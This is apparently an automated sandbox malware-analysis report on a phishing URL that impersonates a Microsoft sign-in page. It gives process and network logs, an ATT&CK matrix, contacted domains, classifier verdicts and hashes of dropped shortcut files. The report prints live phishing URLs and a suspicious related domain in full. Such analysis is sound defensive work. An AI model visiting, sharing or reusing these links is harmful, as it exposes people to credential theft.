Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49816 version: TLS 1.2
Source: classification engineClassification label: mal68.phis.win@17/47@48/298
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\System32\LogonUI.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://jwx.iountanic.com/4rGra/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1952,i,16258610462706437278,6547251417638234460,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1952,i,16258610462706437278,6547251417638234460,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3fee055 /state1:0x41c64e6d
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.logon.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: wincorlib.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xamlhost.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windowmanagementapi.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: inputhost.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: propsys.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: languageoverlayutil.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47mrm.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: profapi.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: netutils.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.globalization.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: directmanipulation.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.controls.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: fontglyphanimator.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.blockedshutdown.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: threadpoolwinrt.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.graphics.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: wldp.dll
Source: C:\Windows\System32\LogonUI.exeSection loaded: wuceffects.dll
Source: C:\Windows\System32\LogonUI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bdc6fc7-83e3-46a4-bfa0-1bc14dbf8b38}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping11
System Information Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Extra Window Memory Injection
1
DLL Side-Loading
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://jwx.iountanic.com/4rGra/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    unknown
    jwx.iountanic.com
    172.67.194.69
    truefalse
      unknown
      code.jquery.com
      151.101.194.137
      truefalse
        unknown
        d2vgu95hoyrpkh.cloudfront.net
        108.138.128.26
        truefalse
          unknown
          7zbz.marigaiv.ru
          188.114.97.3
          truefalse
            unknown
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              unknown
              github.com
              140.82.121.4
              truefalse
                unknown
                cs837.wac.edgecastcdn.net
                192.229.133.221
                truefalse
                  unknown
                  challenges.cloudflare.com
                  104.18.94.41
                  truefalse
                    unknown
                    www.google.com
                    216.58.206.68
                    truefalse
                      unknown
                      d19d360lklgih4.cloudfront.net
                      3.162.38.104
                      truefalse
                        unknown
                        objects.githubusercontent.com
                        185.199.108.133
                        truefalse
                          unknown
                          ok4static.oktacdn.com
                          unknown
                          unknownfalse
                            unknown
                            www.w3schools.com
                            unknown
                            unknownfalse
                              unknown
                              cdn.socket.io
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7ktrue
                                  unknown
                                  https://jwx.iountanic.com/4rGra/true
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.186.68
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    142.250.186.174
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    104.18.94.41
                                    challenges.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    108.138.128.26
                                    d2vgu95hoyrpkh.cloudfront.netUnited States
                                    16509AMAZON-02USfalse
                                    151.101.130.137
                                    unknownUnited States
                                    54113FASTLYUSfalse
                                    35.190.80.1
                                    a.nel.cloudflare.comUnited States
                                    15169GOOGLEUSfalse
                                    151.101.194.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    185.199.110.133
                                    unknownNetherlands
                                    54113FASTLYUSfalse
                                    142.250.186.99
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    142.250.184.195
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    65.9.86.56
                                    unknownUnited States
                                    16509AMAZON-02USfalse
                                    1.1.1.1
                                    unknownAustralia
                                    13335CLOUDFLARENETUSfalse
                                    74.125.71.84
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    172.217.18.3
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    104.18.95.41
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    140.82.121.4
                                    github.comUnited States
                                    36459GITHUBUSfalse
                                    192.229.133.221
                                    cs837.wac.edgecastcdn.netUnited States
                                    15133EDGECASTUSfalse
                                    3.162.38.104
                                    d19d360lklgih4.cloudfront.netUnited States
                                    16509AMAZON-02USfalse
                                    216.58.206.68
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    172.67.194.69
                                    jwx.iountanic.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    13.227.219.11
                                    unknownUnited States
                                    16509AMAZON-02USfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    188.114.97.3
                                    7zbz.marigaiv.ruEuropean Union
                                    13335CLOUDFLARENETUSfalse
                                    188.114.96.3
                                    unknownEuropean Union
                                    13335CLOUDFLARENETUSfalse
                                    142.250.185.195
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    185.199.108.133
                                    objects.githubusercontent.comNetherlands
                                    54113FASTLYUSfalse
                                    142.250.72.110
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    142.250.186.42
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    104.17.25.14
                                    cdnjs.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    IP
                                    192.168.2.16
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1501941
                                    Start date and time:2024-08-30 19:30:26 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                    Sample URL:https://jwx.iountanic.com/4rGra/
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    Analysis Mode:stream
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal68.phis.win@17/47@48/298
                                    • Exclude process from analysis (whitelisted): svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.186.174, 74.125.71.84, 34.104.35.123
                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: https://jwx.iountanic.com/4rGra/
                                    InputOutput
                                    URL: https://jwx.iountanic.com/4rGra/ Model: jbxai
                                    {
                                    "brand":["CLOUDFLARE"],
                                    "contains_trigger_text":false,
                                    "prominent_button_name":"unknown",
                                    "text_input_field_labels":["unknown"],
                                    "pdf_icon_visible":false,
                                    "has_visible_captcha":false,
                                    "has_urgent_text":false,
                                    "has_visible_qrcode":false}
                                    URL: https://jwx.iountanic.com/4rGra/ Model: jbxai
                                    {
                                    "brand":["CLOUDFLARE"],
                                    "contains_trigger_text":false,
                                    "prominent_button_name":"unknown",
                                    "text_input_field_labels":["unknown"],
                                    "pdf_icon_visible":false,
                                    "has_visible_captcha":false,
                                    "has_urgent_text":false,
                                    "has_visible_qrcode":false}
                                    URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
                                    {
                                    "brand":["Audio"],
                                    "contains_trigger_text":false,
                                    "prominent_button_name":"unknown",
                                    "text_input_field_labels":["unknown"],
                                    "pdf_icon_visible":false,
                                    "has_visible_captcha":false,
                                    "has_urgent_text":false,
                                    "has_visible_qrcode":false}
                                    URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
                                    {
                                    "brand":["unknown"],
                                    "contains_trigger_text":false,
                                    "prominent_button_name":"unknown",
                                    "text_input_field_labels":["unknown"],
                                    "pdf_icon_visible":false,
                                    "has_visible_captcha":false,
                                    "has_urgent_text":false,
                                    "has_visible_qrcode":false}
                                    URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
                                    {
                                    "brand":["Microsoft"],
                                    "contains_trigger_text":false,
                                    "prominent_button_name":"Next",
                                    "text_input_field_labels":["Email,
                                     phone,
                                     or Skype",
                                    "No account? Create one! Can't access your account?"],
                                    "pdf_icon_visible":false,
                                    "has_visible_captcha":false,
                                    "has_urgent_text":false,
                                    "has_visible_qrcode":false}
                                    URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
                                    {
                                    "phishing_score":8,
                                    "brand_name":"Microsoft",
                                    "reasons":"The domain name contains a misspelling and an extra character,
                                     which is a common indicator of a phishing site. Additionally,
                                     the use of a pop-up window for the sign-in form is unusual and may be an attempt to trick users into providing sensitive information."}
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2673
                                    Entropy (8bit):3.9977278553805546
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:81D1317FD6CED5466A472C9D6205FE97
                                    SHA1:D23FA65BE9DAC2553025662094D21A277F81146A
                                    SHA-256:1262EF08BBD70ECA894E1BE8B44F42D31160F33F135EA23882BD64721614B614
                                    SHA-512:B2F7D43A702DA314C962FFCAA73D79C77749811796261E903507653E7E68D81B2ADE90D97D4D27424F9C7EAF641E1E58C37EC49F7B831E3995D205BB5333AEB8
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,......`....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2675
                                    Entropy (8bit):4.01253191233928
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:26F554BEA705857ED1E95AB05C886B73
                                    SHA1:7B65E3F84BC901B6EDEEC8DE3F63EC1ACA2485B8
                                    SHA-256:AC11859496CFD1F8138B39D62FDEA93396700D687EA8D0D28BA1DDEB3A785294
                                    SHA-512:C9D41518E5B1CB28B47E0D968D96E3340CD31E773C1BD5ABA2414CC9D68720E2C9AEC0E524D0D862CDE9050CB3D19292721F175EDE46FDA13073C648B2D91D90
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,......`....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2689
                                    Entropy (8bit):4.017225534943486
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:3413053096DAAE157B936DD3190B0F9F
                                    SHA1:DDB660D15AB16E43AFD0DDC3622F6299983DF736
                                    SHA-256:A9A50368CD8F5AA16266FAE188EA10248A890FE1BEB28C52C0C31F6C1220923D
                                    SHA-512:B6232642A1CA59B092B3596E94916F3EBDB7E96CA11B5995535E609767FBE56228BF55733083CD72A0337522053034A20BA9708D5FFABDAFE8DEE80D37A854B7
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):4.011151301776929
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:26569E88E12984BDFDB889D286865B9E
                                    SHA1:2B3B369B0ACB676491DE3560805CAB342915E4FF
                                    SHA-256:E927F4B1959EBE6D2060AE5ED9B14E51EE46440D819A7F8926B7CF7680186862
                                    SHA-512:36617661285D48ACF4D0D8CA78ACDA0E48AB924D7646C45EE144D03D7B2F7A4C39F902E8BCA41D763192363B75C9D1DB99872E55B367A26CE08F59B20AEF68EB
                                    Malicious:false
                                    Reputation:unknown
